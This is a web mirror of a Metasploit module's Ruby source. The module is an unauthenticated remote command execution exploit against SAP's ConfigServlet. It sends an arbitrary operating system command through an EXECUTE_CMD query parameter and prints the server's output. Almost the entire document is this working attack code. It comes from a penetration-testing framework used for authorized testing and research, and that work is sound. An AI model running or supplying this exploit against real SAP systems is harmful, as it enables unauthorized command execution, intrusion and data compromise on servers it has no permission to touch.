Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'SAP ConfigServlet OS Command Execution',

14
        'Description' => %q{

15
          This module allows execution of operating system commands through the SAP

16
          ConfigServlet without any authentication.

17
        },

18
        'Author' => [

19
          'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)

20
          'Andras Kabai' # Metasploit module

21
        ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'OSVDB', '92704' ],

25
          [ 'EDB', '24963' ],

26
          [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']

27
        ],

28
        'DisclosureDate' => '2012-11-01', # Based on the reference presentation

29
        'Notes' => {

30
          'Stability' => [CRASH_SAFE],

31
          'SideEffects' => [IOC_IN_LOGS],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options(

38
      [

39
        Opt::RPORT(50000),

40
        OptString.new('CMD', [ true, 'The command to execute', 'whoami']),

41
        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])

42
      ]

43
    )

44
  end

45


46
  def run

47
    begin

48
      print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])

49
      uri = normalize_uri(target_uri.path, 'ConfigServlet')

50


51
      res = send_request_cgi(

52
        {

53
          'uri' => uri,

54
          'method' => 'GET',

55
          'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD'])

56
        }

57
      )

58
      if !res || (res.code != 200)

59
        print_error("#{rhost}:#{rport} - Exploit failed")

60
        return

61
      end

62
    rescue ::Rex::ConnectionError

63
      print_error("#{rhost}:#{rport} - Failed to connect to the server")

64
      return

65
    end

66


67
    if res.body.include?('Process created')

68
      print_good("#{rhost}:#{rport} - Exploited successfully\n")

69
      print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")

70
      print_line("#{rhost}:#{rport} - Output: #{res.body}")

71
    else

72
      print_error("#{rhost}:#{rport} - Exploit failed")

73
      vprint_error("#{rhost}:#{rport} - Output: #{res.body}")

74
    end

75
  end

76
end

77


78